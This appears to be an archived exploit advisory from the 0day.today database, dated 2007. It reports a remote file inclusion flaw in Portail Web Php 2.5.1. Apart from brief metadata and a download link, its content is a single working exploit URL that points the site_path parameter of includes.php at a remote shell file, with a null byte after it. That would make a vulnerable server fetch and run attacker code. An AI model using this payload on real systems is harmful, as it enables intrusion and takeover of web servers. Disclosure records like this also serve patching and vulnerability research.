id: 1465
date: 02/01/2007
title: Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln
author: Laurent Gaffie
cves: 

==================================================================
Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln
==================================================================



php web portail [remote file include]
download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product:php web portail
bug: remote file include
risk : high

remote file include :

/includes/includes.php?site_path=http://site.com/shell.txt?%00



#  0day.today [2023-03-26]  #